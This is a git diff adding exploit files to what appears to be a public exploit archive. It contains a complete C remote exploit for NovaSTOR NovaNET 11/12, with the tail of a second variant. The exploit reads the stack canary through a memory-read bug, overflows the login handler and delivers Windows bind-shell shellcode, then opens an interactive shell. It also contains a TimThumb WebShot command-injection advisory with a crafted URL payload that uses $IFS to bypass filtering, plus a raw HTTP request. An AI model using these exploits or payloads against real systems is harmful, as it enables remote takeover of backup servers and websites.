+    }
+  printf ("done\n");
+
+  free (pkt_ptr);
+
+  printf ("** sending hup packet...");
+  if ((n = sock_send (fd, hup_buf, sizeof hup_buf - 1)) != NOVANET_HDR_SZ)
+    {
+      fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
+               n, NOVANET_HDR_SZ);
+      exit (EXIT_FAILURE);
+    }
+  printf ("done\n\n");
+
+  usleep (USLEEP_TIME);
+  close (fd);
+}
+
+static void
+novanet_own_process (char *thost, char *d_name)
+{
+  char rbuf_pkt[NOVANET_PKT_SZ], *ptr;
+  int fd, n, rlen;
+
+  fd = sockami (thost, NOVANET_TCP_PORT);
+  if (fd == -1)
+    {
+      fprintf (stderr, "novanet_own_process: sockami failed\n");
+      exit (EXIT_FAILURE);
+    }
+
+  printf ("* connected to %s:%d\n", thost, NOVANET_TCP_PORT);
+
+  memcpy (&login_buf[0x54], d_name, NOVANET_DOMAIN_SZ);
+
+  printf ("** sending login packet...");
+  if ((n = sock_send (fd, login_buf, sizeof login_buf - 1)) != NOVANET_PKT_SZ)
+    {
+      fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
+               n, NOVANET_PKT_SZ);
+      exit (EXIT_FAILURE);
+    }
+  printf ("done\n");
+
+  printf ("** reading fourth packet...");
+  if ((n = sock_recv (fd, rbuf_pkt, sizeof rbuf_pkt)) != NOVANET_PKT_SZ)
+    {
+      fprintf (stderr, "novanet_own_process: sock_recv returned %d (!= %d)\n",
+               n, NOVANET_PKT_SZ);
+      exit (EXIT_FAILURE);
+    }
+  printf ("done\n");
+
+  rlen = 0x138 + 1;
+  *(unsigned int *) &rem_buf[12] = rlen + NOVANET_HDR_SZ;
+
+  printf ("** sending remaining %d-bytes packet...", rlen);
+  if ((n = sock_send (fd, rem_buf, sizeof rem_buf - 1)) != NOVANET_HDR_SZ)
+    {
+      fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
+               n, NOVANET_HDR_SZ);
+      exit (EXIT_FAILURE);
+    }
+  printf ("done\n");
+
+  printf ("** sending hammer packet...");
+
+  ptr = malloc (rlen * sizeof (char));
+  memset (ptr, 0x41, rlen);
+  *(unsigned int *) &ptr[0x134] = NOVANET_POPRET;
+  memcpy (&ptr[0], lnx_x86_bind, sizeof lnx_x86_bind - 1);
+  ptr[rlen - 1] = '\0';
+
+  if ((n = sock_send (fd, ptr, rlen)) != rlen)
+    {
+      fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
+               n, rlen);
+      exit (EXIT_FAILURE);
+    }
+
+  free (ptr);
+  printf ("done\n\n");
+
+  usleep (USLEEP_TIME);
+  close (fd);
+
+  printf ("* waiting for the shellcode to be executed...\n");
+  sleep (2);
+ 
+  if ((fd = sockami (thost, PORT_SHELL)) != -1)
+    {
+      printf ("+Wh00t!\n\n");
+      shellami (fd);
+    }
+}
+
+int
+main (int argc, char **argv)
+{
+  char d_name[NOVANET_DOMAIN_SZ];
+
+  printf ("NovaSTOR NovaNET <= 12.0 remote root exploit\n"
+          "by: <mu-b@digit-labs.org>\n"
+          "http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");
+
+  if (argc < 2)
+    {
+      fprintf (stderr, "Usage: %s <host>\n", argv[0]);
+      exit (EXIT_SUCCESS);
+    }
+
+  novanet_get_domain (argv[1], d_name);
+  novanet_own_process (argv[1], d_name);
+
+  return (EXIT_SUCCESS);
+}
diff --git a/platforms/multiple/remote/33878.c b/platforms/multiple/remote/33878.c
new file mode 100755
index 000000000..54b3288d9
--- /dev/null
+++ b/platforms/multiple/remote/33878.c
@@ -0,0 +1,651 @@
+source: http://www.securityfocus.com/bid/39693/info
+  
+NovaStor NovaNET is prone to code-execution, denial-of-service, and information-disclosure vulnerabilities.
+  
+An attacker can exploit these issues to execute arbitrary code, access sensitive information, or crash the affected application, denying service to legitimate users. Successful attacks may result in the complete compromise of an affected computer.
+  
+NovaNET 11 and 12 are vulnerable to all of these issue; NovaBACKUP Network 13 is affected by a denial-of-service vulnerability.
+
+/* novanet-own.c
+ *
+ * Copyright (c) 2007 by <mu-b@digit-labs.org>
+ *
+ * NovaSTOR NovaNET <= 12.0 remote SYSTEM exploit
+ * by mu-b - Tue Sep 25 2007
+ *
+ * - Tested on: NovaSTOR NovaNET 11.0
+ *
+ * A remote buffer overflow in the login protocol allows arbitrary
+ * code execution as SYSTEM, however, the vulnerable function is
+ * contained in a DLL (nnwindtb.dll) compiled with /gs.
+ *
+ * Thus we exploit another vulnerability to remotely read arbitrary
+ * memory and retrieve the stack canary from nnwindtb.dll @ 0x016A6784.
+ *
+ * Note: this was silently fixed in NovaBACKUP NETWORK 13.0
+ *
+ *    - Private Source Code -DO NOT DISTRIBUTE -
+ * http://www.digit-labs.org/ -- Digit-Labs 2007!@$!
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+
+#include <errno.h>
+#include <netinet/in.h>
+#include <netdb.h>
+#include <string.h>
+#include <unistd.h>
+
+#define HAS_NULL(a)           (((a) - 0x01010101) & ~(a) & 0x80808080)
+#define CANARY_VAL(a,b)       (a ^ b)
+
+/* offset defines           */
+#define NTDLL_ESP             0x7C86A01B
+
+/* thread info defines      */
+#define NOVANET_THREAD_NAME   "Sup: Work to Do"
+
+#define NOVANET_TEB_BLKS      2
+static struct {
+  void *teb_start;
+  int teb_num;
+} teb_addrs[2] = { { (void *) 0x7FFDF000, 11 },
+                   { (void *) 0x7FFB0000, 5  } };
+
+#define WIN32_TEB_SZ          0x1000
+
+/* packet structure defines */
+#define NOVANET_HDR_SZ        0x14
+#define NOVANET_PKT_SZ        0x92
+#define NOVANET_DOMAIN_SZ     0x1F
+#define NOVANET_BUF_SZ        0x400
+
+/* memory read defines      */
+#define NOVANET_READ_SZ       sizeof (void *)
+#define NOVANET_INT_IDX       32
+#define NOVANET_OFFSET        0x100EC480
+#define NOVANET_CALC_INT(a)   (((int) (a)-NOVANET_OFFSET-16)/sizeof (int))
+#define NOVANET_SET_INT(a,b)  *((unsigned int *) &a[NOVANET_INT_IDX]) = b;
+
+#define PORT_SHELL            10000
+#define NOVANET_TCP_PORT      3817
+#define USLEEP_TIME           100000
+
+static char getdomain_buf[] =
+  "\x54\x84\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x92\x00\x00\x00"
+  "\xff\xff\xff\xff\x08\x40\x80\x00\x16\xaa\x11\x02\x4c\x84\xf4\x01"
+  "\x01\x00\x00\x00\xc0\xa8\x01\xbc\x00\x00\x00\x00\x00\x00\x00\x00"
+  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+  "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+  "\x00\x00\x00\x00" "digit-labs!$"
+  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+  "\x00\x00\x00" "Sup: Get Domain Address"
+  "\x00\x00\xff\xff\x00\x00\x06\x10";
+
+static char ack_buf[] =
+  "\x51\x84\x00\x00\x00\x00\x00\x30"
+  "\x05\x00\x00\x00"
+  "\x18\x00\x00\x00"  /* remaining length */
+  "\x00\x00\x00\x00"
+  "\x01\x00\x00\x00";
+
+static char hup_buf[] =
+  "\x56\x84\x00\x00\x00\x00\x00\x00"
+  "\x00\x00\x00\x00"
+  "\x14\x00\x00\x00"  /* remaining length */
+  "\x00\x00\x00\x00";
+
+static char login_buf[] =
+  "\x54\x84\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x92\x00\x00\x00"
+  "\xff\xff\xff\xff\x09\x20\x80\x00\xcb\x14\x4C\x02\x41\xda\x2e\x02"
+  "\x01\x00\x00\x00\xc0\xa8\x01\xbc\x00\x00\x00\x00\x00\x00\x00\x00"
+  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+  "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+  "\x00\x00\x00\x00\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69"
+  "\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69"
+  "\x69\x69\x69" "Dtb: Context"
+  "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+  "\x00\x00\xff\xff\x00\x00\x06\x10";
+
+static char rem_buf[] =
+  "\x51\x84\x00\x00\x02\x02\x02\x32"
+  "\x18\x00\x00\x00"
+  "\x00\x00\x00\x00"  /* remaining length */
+  "\x00\x00\x00\x00";
+
+static char win32_x86_bind[] =
+  "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8e"
+  "\x2b\xb7\x2a\x83\xeb\xfc\xe2\xf4\x72\x41\x5c\x67\x66\xd2\x48\xd5"
+  "\x71\x4b\x3c\x46\xaa\x0f\x3c\x6f\xb2\xa0\xcb\x2f\xf6\x2a\x58\xa1"
+  "\xc1\x33\x3c\x75\xae\x2a\x5c\x63\x05\x1f\x3c\x2b\x60\x1a\x77\xb3"
+  "\x22\xaf\x77\x5e\x89\xea\x7d\x27\x8f\xe9\x5c\xde\xb5\x7f\x93\x02"
+  "\xfb\xce\x3c\x75\xaa\x2a\x5c\x4c\x05\x27\xfc\xa1\xd1\x37\xb6\xc1"
+  "\x8d\x07\x3c\xa3\xe2\x0f\xab\x4b\x4d\x1a\x6c\x4e\x05\x68\x87\xa1"
+  "\xce\x27\x3c\x5a\x92\x86\x3c\x6a\x86\x75\xdf\xa4\xc0\x25\x5b\x7a"
+  "\x71\xfd\xd1\x79\xe8\x43\x84\x18\xe6\x5c\xc4\x18\xd1\x7f\x48\xfa"
+  "\xe6\xe0\x5a\xd6\xb5\x7b\x48\xfc\xd1\xa2\x52\x4c\x0f\xc6\xbf\x28"
+  "\xdb\x41\xb5\xd5\x5e\x43\x6e\x23\x7b\x86\xe0\xd5\x58\x78\xe4\x79"
+  "\xdd\x78\xf4\x79\xcd\x78\x48\xfa\xe8\x43\x90\x3a\xe8\x78\x3e\xcb"
+  "\x1b\x43\x13\x30\xfe\xec\xe0\xd5\x58\x41\xa7\x7b\xdb\xd4\x67\x42"
+  "\x2a\x86\x99\xc3\xd9\xd4\x61\x79\xdb\xd4\x67\x42\x6b\x62\x31\x63"
+  "\xd9\xd4\x61\x7a\xda\x7f\xe2\xd5\x5e\xb8\xdf\xcd\xf7\xed\xce\x7d"
+  "\x71\xfd\xe2\xd5\x5e\x4d\xdd\x4e\xe8\x43\xd4\x47\x07\xce\xdd\x7a"
+  "\xd7\x02\x7b\xa3\x69\x41\xf3\xa3\x6c\x1a\x77\xd9\x24\xd5\xf5\x07"
+  "\x70\x69\x9b\xb9\x03\x51\x8f\x81\x25\x80\xdf\x58\x70\x98\xa1\xd5"
+  "\xfb\x6f\x48\xfc\xd5\x7c\xe5\x7b\xdf\x7a\xdd\x2b\xdf\x7a\xe2\x7b"
+  "\x71\xfb\xdf\x87\x57\x2e\x79\x79\x71\xfd\xdd\xd5\x71\x1c\x48\xfa"
+  "\x05\x7c\x4b\xa9\x4a\x4f\x48\xfc\xdc\xd4\x67\x42\x61\xe5\x57\x4a"
+  "\xdd\xd4\x61\xd5\x5e\x2b\xb7\x2a";
+
+static int
+sock_send (int fd, char *src, int len)
+{
+  int n;
+  if ((n = send (fd, src, len, 0)) < 0)
+    {
+      fprintf (stderr, "sock_send: send() - %s\n", strerror (errno));
+      exit (EXIT_FAILURE);
+    }
+
+  return (n);
+}
+
+static int
+sock_recv (int fd, char *dst, int len)
+{
+  int n;
+  if ((n = recv (fd, dst, len, 0)) < 0)
+    {
+      fprintf (stderr, "sock_recv: recv() - %s\n", strerror (errno));
+      exit (EXIT_FAILURE);
+    }
+
+  return (n);
+}
+
+static void
+shellami (int fd)
+{
+  int n;
+  fd_set rset;
+  char rbuf[1024];
+
+  while (1)
+    {
+      FD_ZERO (&rset);
+      FD_SET (fd, &rset);
+      FD_SET (STDIN_FILENO, &rset);
+
+      if (select (fd + 1, &rset, NULL, NULL, NULL) < 0)
+        {
+          fprintf (stderr, "shellami: select() - %s\n", strerror (errno));
+          exit (EXIT_FAILURE);
+        }
+
+      if (FD_ISSET (fd, &rset))
+        {
+          if ((n = sock_recv (fd, rbuf, sizeof (rbuf) - 1)) <= 0)
+            {
+              fprintf (stderr, "shellami: connection closed by foreign host.\n");
+              exit (EXIT_SUCCESS);
+            }
+          rbuf[n] = '\0';
+          printf ("%s", rbuf);
+          fflush (stdout);
+        }
+      if (FD_ISSET (STDIN_FILENO, &rset))
+        {
+          if ((n = read (STDIN_FILENO, rbuf, sizeof (rbuf) - 1)) > 0)
+            {
+              rbuf[n] = '\0';
+              sock_send (fd, rbuf, n);
+            }
+        }
+    }
+}
+
+static int
+sockami (char *host, int port)
+{
+  struct sockaddr_in address;
+  struct hostent *hp;
+  int fd;
+
+  if ((fd = socket (AF_INET, SOCK_STREAM, 0)) == -1)
+    {
+      fprintf (stderr, "sockami: socket() - %s\n", strerror (errno));
+      exit (EXIT_FAILURE);
+    }
+
+  if ((hp = gethostbyname (host)) == NULL)
+    {
+      fprintf (stderr, "sockami: gethostbyname() - %s\n", strerror (errno));
+      exit (EXIT_FAILURE);
+    }
+
+  memset (&address, 0, sizeof (address));
+  memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);
+  address.sin_family = AF_INET;
+  address.sin_port = htons (port);
+
+  if (connect (fd, (struct sockaddr *) &address, sizeof (address)) < 0)
+    {
+      fprintf (stderr, "sockami: connect() - %s\n", strerror (errno));
+      return (-1);
+    }
+
+  return (fd);
+}
+
+static void
+novanet_read_pkt_init (char *pkt)
+{
+  char *ptr = pkt;
+
+  /* add packet header */
+  *ptr++ = 0x54;
+  *ptr++ = 0x84;
+
+  /* add padding */
+  memset (ptr, 0x00, 0x1E);
+  ptr   += 0x1E;
+
+  /* add our dodgy-int */
+  memset (ptr, 0x69, sizeof (int));
+  ptr   += sizeof (int);
+
+  memset (ptr, 0x00, NOVANET_PKT_SZ-(ptr-pkt));
+}
+
+static int
+novanet_read (char *host, void *start, void *dst)
+{
+  fd_set r_fds;
+  struct timeval tv;
+  int fd, n;
+  char buf[NOVANET_PKT_SZ], rbuf[NOVANET_PKT_SZ];
+
+  novanet_read_pkt_init (buf);
+  start = (void *) NOVANET_CALC_INT (start);
+
+  fd = sockami (host, NOVANET_TCP_PORT);
+  if (fd == -1)
+    {
+      fprintf (stderr, "novanet_read: sockami failed\n");
+      exit (EXIT_FAILURE);
+    }
+
+  NOVANET_SET_INT (buf, (unsigned int) start);
+  if ((n = sock_send (fd, buf, sizeof buf)) != NOVANET_PKT_SZ)
+    {
+      fprintf (stderr, "novanet_read: sock_send returned %d (!= %d)\n",
+               n, NOVANET_PKT_SZ);
+      return (0);
+    }
+
+  FD_ZERO (&r_fds);
+  FD_SET (fd, &r_fds);
+  tv.tv_sec = 4;        /* wait 4 seconds */
+  tv.tv_usec = 0;
+
+  n = select (fd + 1, &r_fds, NULL, NULL, &tv);
+  if (n == -1)
+    {
+      fprintf (stderr, "novanet_read: select() - %s\n", strerror (errno));
+      exit (EXIT_FAILURE);
+    }
+  else if (n)
+    {
+      if ((n = sock_recv (fd, rbuf, sizeof rbuf)) != NOVANET_PKT_SZ)
+        {
+          fprintf (stderr, "novanet_read: sock_recv returned %d (!= %d)\n",
+                   n, NOVANET_PKT_SZ);
+          return (0);
+        }
+    }
+  else
+    {
+      fprintf (stderr, "novanet_read: select timeout, we may have crashed NovaNET :(\n");
+      exit (EXIT_FAILURE);
+    }
+
+  memcpy (dst, &rbuf[NOVANET_INT_IDX], sizeof (void *));
+  usleep (USLEEP_TIME);
+  close (fd);
+
+  return (1);
+}
+
+static void
+novanet_read_str (char *host, void *start, char *dst, int dst_len)
+{
+  char r_val[NOVANET_READ_SZ], *ptr;
+  void *r_addr;
+  int nbytes;
+
+  nbytes = 0;
+  ptr = dst;
+  r_addr = start;
+
+  do
+    {
+      if (novanet_read (host, r_addr, &r_val) == 0)
+        break;
+
+      strncpy (ptr, r_val, 4);
+      if (HAS_NULL (*(int *) r_val))
+        break;
+
+      ptr    += 4;
+      r_addr += 4;
+      nbytes += 4;
+    }
+  while (nbytes < dst_len - 5);
+}
+
+static int 
+novanet_map_process (char *host, int *esp_val)
+{
+  void *r_addr, *teb_addr, *thr_list, *arg_addr;
+  int i, j, num_threads, thr_count;
+  char r_buf[NOVANET_BUF_SZ];
+
+  r_addr = (void *) 0x10133C60 + 0x12510;
+  if (novanet_read (host, r_addr, &thr_count) == 0)
+    return (-1);
+
+  printf ("** [nnwinsup.dll @ 0x10133C60+0x12510] thread list used: 0x%08X\n",
+          thr_count);
+
+  num_threads = 0;
+  r_addr = (void *) 0x10133C60 + 0xB938;
+  if (novanet_read (host, r_addr, &thr_list) == 0)
+    return (-1);
+
+  printf ("*** [nnwinsup.dll @ 0x10133C60+0x0B938] head ptr: 0x%08X\n", (int) thr_list);
+
+  arg_addr = NULL;
+  while ((r_addr = thr_list))
+    {
+      if (novanet_read (host, r_addr, &thr_list) == 0)
+        return (-1);
+
+      novanet_read_str (host, r_addr + 0xE8, r_buf, sizeof r_buf);
+
+      printf ("*** [nnwinsup.dll @ 0x%08X] next ptr: 0x%08X, name: \"%s\"\n",
+              (int) r_addr, (int) thr_list, r_buf);
+
+      if (strcmp (r_buf, NOVANET_THREAD_NAME) == 0)
+        arg_addr = r_addr;
+
+      if (thr_list != NULL)
+        num_threads++;
+    }
+
+  printf ("** [nnwinsup.dll @ 0x10133C60+0x0B938] thread count: %d\n", num_threads);
+
+  if (arg_addr == NULL)
+    return (-1);
+
+  for (i = 0; i < NOVANET_TEB_BLKS; i++)
+    {
+      teb_addr = teb_addrs[i].teb_start - WIN32_TEB_SZ;
+      printf ("** [TEB BLK @ 0x%08X] scanning %d blocks\n", (int) teb_addr, teb_addrs[i].teb_num);
+
+      for (j = 0; j < teb_addrs[i].teb_num; j++, teb_addr -= WIN32_TEB_SZ)
+        {
+          int st_addr, sb_addr, thr_id;
+          void *thr_arg;
+
+          r_addr = teb_addr + 0x04;
+          if (novanet_read (host, r_addr, &st_addr) == 0)
+            break;
+
+          r_addr = teb_addr + 0x08;
+          if (novanet_read (host, r_addr, &sb_addr) == 0)
+            break;
+
+          r_addr = teb_addr + 0x24;
+          if (novanet_read (host, r_addr, &thr_id) == 0)
+            break;
+
+          if (st_addr != 0xFFFFFFFF)
+            {
+              r_addr = (void *) st_addr - 0x7C;
+
+              if (novanet_read (host, r_addr, &thr_arg) == 0)
+                break;
+            }
+          else
+            thr_arg = (void *) 0xDEADBEEF;
+
+          printf ("** [TEB @ 0x%08X] thread id: %04X, stack base: 0x%08X, top: 0x%08X, arg: 0x%08X\n",
+                  (int) teb_addr, thr_id, sb_addr, st_addr, (int) thr_arg);
+
+          if (thr_arg == arg_addr)
+            {
+              printf ("** [TEB @ 0x%08X] found thread id: %04X, stack top: 0x%08X, ESP: 0x%08X\n",
+                      (int) teb_addr, thr_id, st_addr, st_addr - 0x444);
+              *esp_val = st_addr - 0x444;
+
+              return  (0);
+            }
+        }
+    }
+
+  return (-1);
+}
+
+static void
+novanet_get_domain (char *thost, char *d_name)
+{
+  char rbuf_hdr[NOVANET_HDR_SZ], rbuf_pkt[NOVANET_PKT_SZ], *pkt_ptr;
+  int fd, n, rlen;
+
+  fd = sockami (thost, NOVANET_TCP_PORT);
+  if (fd == -1)
+    {
+      fprintf (stderr, "novanet_get_domain: sockami failed\n");
+      exit (EXIT_FAILURE);
+    }
+
+  printf ("* connected to %s:%d\n", thost, NOVANET_TCP_PORT);
+
+  printf ("** sending getdomain_buf packet...");
+  if ((n = sock_send (fd, getdomain_buf, sizeof getdomain_buf - 1)) != NOVANET_PKT_SZ)
+    {
+      fprintf (stderr, "novanet_get_domain: sock_send returned %d (!= %d)\n",
+               n, NOVANET_PKT_SZ);
+      exit (EXIT_FAILURE);
+    }
+  printf ("done\n");
+
+  printf ("** reading first reply...");
+  if ((n = sock_recv (fd, rbuf_pkt, sizeof rbuf_pkt)) != NOVANET_PKT_SZ)
+    {
+      fprintf (stderr, "novanet_get_domain: sock_recv returned %d (!= %d)\n",
+               n, NOVANET_PKT_SZ);
+      exit (EXIT_FAILURE);
+    }
+  printf ("done\n");
+
+  memcpy (d_name, &rbuf_pkt[0x54], NOVANET_DOMAIN_SZ);
+  printf ("** remote domain address: %.*s\n", NOVANET_DOMAIN_SZ, d_name);
+
+  printf ("** sending ack packet...");
+  if ((n = sock_send (fd, ack_buf, sizeof ack_buf - 1)) != NOVANET_HDR_SZ + 4)
+    {
+      fprintf (stderr, "novanet_get_domain: sock_send returned %d (!= %d)\n",
+               n, NOVANET_HDR_SZ + 4);
+      exit (EXIT_FAILURE);
+    }
+  printf ("done\n");
+
+  printf ("** reading second reply...");
+  if ((n = sock_recv (fd, rbuf_hdr, sizeof rbuf_hdr)) != NOVANET_HDR_SZ)
+    {
+      fprintf (stderr, "novanet_get_domain: sock_recv returned %d (!= %d)\n",
+               n, NOVANET_HDR_SZ);
+      exit (EXIT_FAILURE);
+    }
+  printf ("done\n");
+
+  rlen  = *(unsigned int *) &rbuf_hdr[12];
+  if (rlen < NOVANET_HDR_SZ)
+    {
+      fprintf (stderr, "novanet_get_domain: remaining length invalid (<%d)\n",
+               NOVANET_HDR_SZ);
+      exit (EXIT_FAILURE);
+    }
+
+  rlen -= NOVANET_HDR_SZ;
+  printf ("** reading %d-remaining bytes...", rlen);
+  pkt_ptr = malloc (rlen * sizeof (char));
+
+  if ((n = sock_recv (fd, pkt_ptr, rlen)) != rlen)
+    {
+      fprintf (stderr, "novanet_get_domain: sock_recv returned %d (!= %d)\n",
+               n, rlen);
+      exit (EXIT_FAILURE);
+    }
+  printf ("done\n");
+
+  free (pkt_ptr);
+
+  printf ("** sending hup packet...");
+  if ((n = sock_send (fd, hup_buf, sizeof hup_buf - 1)) != NOVANET_HDR_SZ)
+    {
+      fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
+               n, NOVANET_HDR_SZ);
+      exit (EXIT_FAILURE);
+    }
+  printf ("done\n\n");
+
+  usleep (USLEEP_TIME);
+  close (fd);
+}
+
+static void
+novanet_own_process (char *thost, char *d_name, int esp_val)
+{
+  char rbuf_pkt[NOVANET_PKT_SZ], *ptr;
+  int canary_val, fd, n, rlen;
+
+  if (novanet_read (thost, (void *) 0x016A6784, &canary_val) == 0)
+    {
+      fprintf (stderr, "novanet_own_process: reading canary failed\n");
+      exit (EXIT_FAILURE);
+    }
+
+  fd = sockami (thost, NOVANET_TCP_PORT);
+  if (fd == -1)
+    {
+      fprintf (stderr, "novanet_own_process: sockami failed\n");
+      exit (EXIT_FAILURE);
+    }
+
+  printf ("** [nnwindtb.dll @ 0x016A6784] stack canary: 0x%08X\n\n", (int) canary_val);
+  if (HAS_NULL (CANARY_VAL(canary_val, esp_val)))
+    {
+      fprintf (stderr, "novanet_own_process: canary value invalid :(\n");
+      exit (EXIT_FAILURE);
+    }
+
+  printf ("* connected to %s:%d\n", thost, NOVANET_TCP_PORT);
+
+  memcpy (&login_buf[0x54], d_name, NOVANET_DOMAIN_SZ);
+
+  printf ("** sending login packet...");
+  if ((n = sock_send (fd, login_buf, sizeof login_buf - 1)) != NOVANET_PKT_SZ)
+    {
+      fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
+               n, NOVANET_PKT_SZ);
+      exit (EXIT_FAILURE);
+    }
+  printf ("done\n");
+
+  printf ("** reading fourth packet...");
+  if ((n = sock_recv (fd, rbuf_pkt, sizeof rbuf_pkt)) != NOVANET_PKT_SZ)
+    {
+      fprintf (stderr, "novanet_own_process: sock_recv returned %d (!= %d)\n",
+               n, NOVANET_PKT_SZ);
+      exit (EXIT_FAILURE);
+    }
+  printf ("done\n");
+
+  rlen = 0x10C + 64 + (sizeof win32_x86_bind - 1) + 1;
+  *(unsigned int *) &rem_buf[12] = rlen + NOVANET_HDR_SZ;
+
+  printf ("** sending remaining %d-bytes packet...", rlen);
+  if ((n = sock_send (fd, rem_buf, sizeof rem_buf - 1)) != NOVANET_HDR_SZ)
+    {
+      fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
+               n, NOVANET_HDR_SZ);
+      exit (EXIT_FAILURE);
+    }
+  printf ("done\n");
+
+  printf ("** sending hammer packet...");
+
+  ptr = malloc (rlen * sizeof (char));
+  memset (ptr, 0x41, rlen);
+  *(unsigned int *) &ptr[0x104] = CANARY_VAL(canary_val, esp_val);
+  *(unsigned int *) &ptr[0x108] = NTDLL_ESP;
+  memcpy (&ptr[0x10C + 64], win32_x86_bind, sizeof win32_x86_bind - 1);
+  ptr[rlen - 1] = '\0';
+
+  if ((n = sock_send (fd, ptr, rlen)) != rlen)
+    {
+      fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
+               n, rlen);
+      exit (EXIT_FAILURE);
+    }
+
+  free (ptr);
+  printf ("done\n\n");
+
+  usleep (USLEEP_TIME);
+  close (fd);
+
+  printf ("* waiting for the shellcode to be executed...\n");
+  sleep (2);
+ 
+  if ((fd = sockami (thost, PORT_SHELL)) != -1)
+    {
+      printf ("+Wh00t!\n\n");
+      shellami (fd);
+    }
+}
+
+int
+main (int argc, char **argv)
+{
+  char d_name[NOVANET_DOMAIN_SZ];
+  int esp_val;
+
+  printf ("NovaSTOR NovaNET <= 12.0 remote SYSTEM exploit\n"
+          "by: <mu-b@digit-labs.org>\n"
+          "http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");
+
+  if (argc < 2)
+    {
+      fprintf (stderr, "Usage: %s <host>\n", argv[0]);
+      exit (EXIT_SUCCESS);
+    }
+
+  esp_val = 0xdeadbeef;
+
+  printf ("* mapping remote process...\n");
+  if (novanet_map_process (argv[1], &esp_val) < 0)
+    {
+      fprintf (stderr, "novanet_map_process: unable to locate thread :(\n");
+      exit (EXIT_SUCCESS);
+    }
+  printf ("* done\n\n");
+
+  novanet_get_domain (argv[1], d_name);
+  novanet_own_process (argv[1], d_name, esp_val);
+
+  return (EXIT_SUCCESS);
+}
diff --git a/platforms/php/webapps/33851.txt b/platforms/php/webapps/33851.txt
new file mode 100755
index 000000000..25a3dd520
--- /dev/null
+++ b/platforms/php/webapps/33851.txt
@@ -0,0 +1,201 @@
+######################################################################
+#  _     ___  _   _  ____  ____    _  _____
+#  | |   / _ \| \ | |/ ___|/ ___|  / \|_   _|
+#  | |  | | | |  \| | |  _| |     / _ \ | |
+#  | |__| |_| | |\  | |_| | |___ / ___ \| |
+#  |_____\___/|_| \_|\____|\____/_/   \_\_|
+#
+# Wordpress TimThumb 2.8.13 WebShot Remote Code Execution (0-day)
+# Affected website : a lot Wordpress Themes, Plugins, 3rd party components
+# Exploit Author : @u0x (Pichaya Morimoto)
+# Release dates : June 24, 2014
+#
+# Special Thanks to 2600 Thailand group
+# : Xelenonz, anidear, windows98se, icheernoom, w4x0r, pistachio
+# https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/
+#
+########################################################################
+
+[+] Description
+============================================================
+TimThumb is a small php script for cropping, zooming and resizing web
+images (jpg, png, gif). Perfect for use on blogs and other applications.
+Developed for use in the WordPress theme Mimbo Pro, and since used in many
+other WordPress themes.
+
+http://www.binarymoon.co.uk/projects/timthumb/
+https://code.google.com/p/timthumb/
+
+The original project  WordThumb 1.07 also vulnerable (
+https://code.google.com/p/wordthumb/)
+They both shared exactly the same WebShot code! And there are several
+projects that shipped with "timthumb.php", such as,
+Wordpress Gallery Plugin
+https://wordpress.org/plugins/wordpress-gallery-plugin/
+IGIT Posts Slider Widget
+http://wordpress.org/plugins/igit-posts-slider-widget/
+
+All themes from http://themify.me/ contains vulnerable "wordthumb" in
+"<theme-name>/themify/img.php".
+
+[+] Exploit
+============================================================
+http://
+<wp-website>/wp-content/themes/<wp-theme>/path/to/timthumb.php?webshot=1&src=http://
+<wp-website>$(<os-cmds>)
+
+** Note that OS commands payload MUST be within following character sets:
+[A-Za-z0-9\-\.\_\~:\/\?\#\[\]\@\!\$\&\'\(\)\*\+\,\;\=]
+
+** Spaces, Pipe, GT sign are not allowed.
+** This WebShot feature is DISABLED by default.
+** CutyCapt and XVFB must be installed in constants.
+
+[+] Proof-of-Concept
+============================================================
+There are couple techniques that can be used to bypass limited charsets but
+I will use a shell variable $IFS insteads of space in this scenario.
+
+PoC Environment:
+Ubuntu 14.04 LTS
+PHP 5.5.9
+Wordpress 3.9.1
+Themify Parallax Theme 1.5.2
+WordThumb 1.07
+
+Crafted Exploit:
+http://loncatlab.local/wp-content/themes/parallax/themify/img.php?webshot=1&src=http://loncatlab.local/$(touch$IFS/tmp/longcat)
+
+GET /wp-content/themes/parallax/themify/img.php?webshot=1&src=
+http://longcatlab.local/$(touch$IFS/tmp/longcat) HTTP/1.1
+Host: longcatlab.local
+Proxy-Connection: keep-alive
+Cache-Control: max-age=0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
+Gecko) Chrome/35.0.1916.153 Safari/537.36
+Accept-Encoding: gzip,deflate,sdch
+Accept-Language: en-US,en;q=0.8
+Cookie: woocommerce_recently_viewed=9%7C12%7C16;
+wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce;
+wp-settings-time-1=1403504538; themify-builder-tabs=query-portfoliot;
+wordpress_test_cookie=WP+Cookie+check;
+wordpress_logged_in_26775808be2a17b15cf43dfee3a681c9=moderator%7C1403747599%7C62244ce3918e23df1bd22450b3d78685
+
